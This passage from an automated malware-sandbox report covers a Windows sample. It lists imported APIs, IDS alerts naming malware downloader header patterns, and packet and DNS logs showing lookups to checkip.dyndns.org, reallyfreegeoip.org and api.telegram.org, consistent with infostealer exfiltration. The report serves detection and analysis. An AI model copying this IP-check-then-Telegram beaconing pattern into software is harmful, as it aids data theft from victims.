GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-11T08:59:03.225723+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-11T08:59:05.960090+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | TCP
2024-12-11T08:59:07.568512+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49732 | 104.21.67.152 | 443 | TCP
2024-12-11T08:59:09.039176+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | TCP
2024-12-11T08:59:10.654855+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49734 | 104.21.67.152 | 443 | TCP
2024-12-11T08:59:16.914491+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49738 | 104.21.67.152 | 443 | TCP
2024-12-11T08:59:20.091991+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49742 | 104.21.67.152 | 443 | TCP
2024-12-11T08:59:23.246084+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49746 | 104.21.67.152 | 443 | TCP
2024-12-11T08:59:26.366616+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49750 | 104.21.67.152 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 08:59:01.318991899 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:01.438355923 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:01.438436031 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:01.438780069 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:01.557991028 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:02.743061066 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:02.747498989 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:02.866754055 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:03.171295881 CET | 80 | 49730 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:03.225723028 CET | 49730 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:03.676853895 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:03.676884890 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:03.676959991 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:03.788399935 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:03.788418055 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:05.017215014 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:05.017308950 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:05.021869898 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:05.021879911 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:05.022135973 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:05.069487095 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:05.069998980 CET | 49731 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:05.115344048 CET | 443 | 49731 | 104.21.67.152 | 192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.456480980 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.456541061 CET44349731104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.458766937 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.473763943 CET49731443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.477065086 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:05.596426010 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.905229092 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.907561064 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.907587051 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.907653093 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.908054113 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:05.908065081 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:05.960089922 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.117592096 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.119402885 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.119416952 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568540096 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568597078 CET44349732104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.568716049 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.569271088 CET49732443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:07.572292089 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.573467016 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.691858053 CET8049730132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.691920042 CET4973080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.692750931 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:07.692815065 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.692929029 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:07.812321901 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.997108936 CET8049733132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.998626947 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.998656034 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:08.998914957 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.999166012 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:08.999177933 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:09.039175987 CET4973380192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.208127975 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.209640026 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.209667921 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.654881001 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.654947996 CET44349734104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.655009985 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.655400038 CET49734443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:10.659502983 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.778765917 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:10.779094934 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.779278040 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:10.898581982 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.083074093 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.086447954 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086493015 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.086556911 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086863995 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:12.086879015 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:12.132004976 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.296272039 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.298150063 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.298171043 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747071981 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747144938 CET44349736104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.747179985 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.747652054 CET49736443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:13.751039982 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.752188921 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.870907068 CET8049735132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.870965004 CET4973580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.871474028 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:13.871541023 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.871773958 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:13.991030931 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.217556000 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.218832016 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.218883991 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.218947887 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.219239950 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:15.219259977 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:15.272619963 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:16.429938078 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.431567907 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.431596041 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914542913 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914613008 CET44349738104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:16.914658070 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.915096045 CET49738443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:16.918487072 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:16.919570923 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.038155079 CET8049737132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:17.038239002 CET4973780192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.038877964 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:17.038954020 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.039071083 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:17.158272028 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.355011940 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.380641937 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.380692005 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.380754948 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.380983114 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:18.381004095 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:18.397591114 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:19.606020927 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:19.607570887 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:19.607592106 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.092021942 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.092088938 CET44349742104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.096698999 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:20.099955082 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.099958897 CET49742443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:20.101028919 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.219691992 CET8049740132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.219796896 CET4974080192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.220288992 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:20.220626116 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.220731974 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:20.340003967 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.540848970 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.555983067 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.556030989 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.556135893 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.559952021 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:21.559961081 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:21.598521948 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:22.801476002 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:22.810364962 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:22.810391903 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246098995 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246160030 CET44349746104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.246345043 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:23.246635914 CET49746443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:23.249793053 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.250830889 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.369596958 CET8049745132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.369657040 CET4974580192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.370132923 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:23.370198011 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.370296001 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:23.489583969 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.676857948 CET8049748132.226.247.73192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.708775043 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.708815098 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.708883047 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.709135056 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:24.709146976 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:24.725728989 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:25.920510054 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:25.931560993 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:25.931595087 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366636038 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366678953 CET44349750104.21.67.152192.168.2.4
                                                                                                                    Dec 11, 2024 08:59:26.366781950 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:26.368623018 CET49750443192.168.2.4104.21.67.152
                                                                                                                    Dec 11, 2024 08:59:26.369898081 CET4974880192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.370985031 CET4975180192.168.2.4132.226.247.73
                                                                                                                    Dec 11, 2024 08:59:26.489792109 CET8049748132.226.247.73192.168.2.4
Dec 11, 2024 08:59:26.489953041 CET | 49748 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:26.490550995 CET | 80 | 49751 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:26.490622044 CET | 49751 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:26.490787029 CET | 49751 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:26.609956980 CET | 80 | 49751 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:27.799544096 CET | 80 | 49751 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:27.800764084 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:27.800795078 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:27.800857067 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:27.801089048 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:27.801100016 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:27.850712061 CET | 49751 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:29.038005114 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:29.045660019 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:29.045684099 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:29.481811047 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:29.481861115 CET | 443 | 49752 | 104.21.67.152 | 192.168.2.4
Dec 11, 2024 08:59:29.481914043 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:29.482453108 CET | 49752 | 443 | 192.168.2.4 | 104.21.67.152
Dec 11, 2024 08:59:29.496918917 CET | 49751 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:29.617921114 CET | 80 | 49751 | 132.226.247.73 | 192.168.2.4
Dec 11, 2024 08:59:29.618794918 CET | 49751 | 80 | 192.168.2.4 | 132.226.247.73
Dec 11, 2024 08:59:29.643451929 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:29.643487930 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:29.643554926 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:29.644010067 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:29.644023895 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.010685921 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.010766029 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:31.014373064 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:31.014384031 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.014611959 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.015995026 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:31.063325882 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.514045000 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.514101028 CET | 443 | 49753 | 149.154.167.220 | 192.168.2.4
Dec 11, 2024 08:59:31.514194012 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:31.522144079 CET | 49753 | 443 | 192.168.2.4 | 149.154.167.220
Dec 11, 2024 08:59:48.148422956 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 08:59:01.174084902 CET | 51372 | 53 | 192.168.2.4 | 1.1.1.1
Dec 11, 2024 08:59:01.312005043 CET | 53 | 51372 | 1.1.1.1 | 192.168.2.4
Dec 11, 2024 08:59:03.234148979 CET | 54212 | 53 | 192.168.2.4 | 1.1.1.1
Dec 11, 2024 08:59:03.674097061 CET | 53 | 54212 | 1.1.1.1 | 192.168.2.4
Dec 11, 2024 08:59:29.497351885 CET | 54172 | 53 | 192.168.2.4 | 1.1.1.1
Dec 11, 2024 08:59:29.641657114 CET | 53 | 54172 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 11, 2024 08:59:01.174084902 CET | 192.168.2.4 | 1.1.1.1 | 0xd6e7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:03.234148979 CET | 192.168.2.4 | 1.1.1.1 | 0x969c | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:29.497351885 CET | 192.168.2.4 | 1.1.1.1 | 0x9cce | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
